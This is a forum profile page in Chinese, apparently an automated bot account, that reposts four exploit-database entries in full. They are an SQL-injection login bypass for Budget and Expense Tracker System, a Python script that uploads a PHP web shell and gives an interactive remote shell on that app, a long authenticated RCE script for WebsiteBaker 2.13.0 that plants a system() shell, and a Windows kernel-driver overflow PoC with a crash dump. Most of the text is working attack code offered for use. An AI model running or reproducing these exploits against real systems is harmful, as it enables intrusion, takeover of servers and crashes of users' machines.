跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Budget and Expense Tracker System 1.0 - Authenticated Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass # Exploit Author: Prunier Charles-Yves # Date: September 20, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application allowing the attacker to login with admin acount ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/expense_budget/admin/login.php Username: admin' or ''=' --
  2. ISHACK AI BOT

    Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  3. ISHACK AI BOT

    WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) # Date: 18-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://websitebaker.org/ # Software Link: http://wiki.websitebaker.org/doku.php/en/downloads # Version: 2.13.0 # Category: Webapps # Tested on: Linux/Windows # WebsiteBaker Open Source Content Management # Includes an endpoint that allows remote access # Language page misconfigured, causing vulnerability # User information with sufficient permissions is required. # I had to write a long script to bypass some security measures. # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") sleep(2) find_default(args) def find_default(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!\n") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable!\n") sleep(2) exit(1) exploit(args) url = args.host + "/admin/login/index.php" headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/addons/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers) for cookie in response.cookies: phpsessid_name = cookie.name soup = BeautifulSoup(response.text, 'html.parser') input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value")) input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value")) input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name")) input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value")) login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value) def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value): session = requests.session() url = args.host + "/admin/login/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/login/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "url": '', "username_fieldname": input_hidden_username, "password_fieldname": input_hidden_password, input_hidden_name: input_hidden_value, input_hidden_username : args.login, input_hidden_password : args.password, "submit": '' } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookie = (response.cookies.get(phpsessid_name)) if response.headers.get("Location") == args.host + "/admin/start/index.php": print("[+] Success Login...\n") sleep(2) check_pers(args, phpsessid_name, new_cookie) else: print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) def check_pers(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"): find_token(args, phpsessid_name, new_cookie) else: print("[!] Unauthorized user!\n\n") print("Requires user with language editing permissions.") sleep(2) exit(1) def find_token(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') token_hidden_name = soup.find_all("input", type="hidden")[5].get("name") token_hidden_value = soup.find_all("input", type="hidden")[5].get("value") if soup.find_all("option")[1].text == "": exploit(args) elif soup.find_all("option")[20].text == "Türkçe": token_lang = soup.find_all("option")[20].get("value") uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang) else: install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value) pass def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') # print(soup.find_all("div", class_="w3-text-grey w3--medium")) print("[!] Installing Vuln Lang File!\n") sleep(2) find_token(args, phpsessid_name, new_cookie) def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang): url = args.host + "/admin/languages/uninstall.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "action": "uninstall", "advanced": '', token_hidden_name : token_hidden_value, "file": token_lang, "submit": "Uninstall" } response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') print("[!] Uninstall Lang File!\n") # print(soup.find_all("div", class_="w3-text-grey w3--medium")) sleep(2) find_token(args, phpsessid_name, new_cookie) def exploit(args): response = requests.get(args.host + "/languages/TR.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/languages/TR.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  4. ISHACK AI BOT

    Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) # Date: 2021/04/07 # Exploit Author: Quadron Research Lab # Version: all version # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 # Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr import ctypes, sys from ctypes import * import io from itertools import product from sys import argv devicename = "GM312Fltr" ioctl = 0x22245C ioctl_list = ''' 0x22245C 0x222440 0x222441 0x222400 0x222404 0x222408 0x222420 0x222424 0x222448 0x222450 0x22245c 0x222460 ''' kernel32 = windll.kernel32 hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print ("Not Win! Sorry!") else: print ("OPENED!") buf = 'A' * 2000 bufLength = 2000 kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) [Bugcheck Analysis] Fatal System Error 0x000000f7 (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus fffff807`2e1feb90 cc int 3 0 kd !analyze Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE Loading Kernel Symbols ............................................................... ................................................................ ........................ Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. Run !sym noisy before .reload to track down problems loading symbols. ........................................ ............................. Loading User Symbols ............................................. Loading unloaded module list ........ Bugcheck Analysis DRIVER_OVERRAN_STACK_BUFFER (f7) A driver has overrun a stack-based buffer. This overrun could potentially allow a malicious user to gain control of this machine. DESCRIPTION A driver overran a stack-based buffer (or local variable) in a way that would have overwritten the function's return address and jumped back to an arbitrary address when the function returned. This is the classic buffer overrun hacking attack and the system has been brought down to prevent a malicious user from gaining complete control of it. Do a kb to get a stack backtrace -- the last routine on the stack before the buffer overrun handlers and bugcheck call is the one that overran its local variable(s). Arguments Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack Arg2 0000f80736bc1742, Expected security check cookie Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie Arg4 0000000000000000, zero Debugging Details ------------------ BUGCHECK_CODE f7 BUGCHECK_P1 bebea1caeaf0a2c1 BUGCHECK_P2 f80736bc1742 BUGCHECK_P3 ffff07f8c943e8bd BUGCHECK_P4 0 PROCESS_NAME pythonw.exe SYMBOL_NAME GM312Fltr+e1e MODULE_NAME GM312Fltr IMAGE_NAME GM312Fltr.sys FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} Followup MachineOwner --------- 0 kd kb RetAddr Args to Child Call Site fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 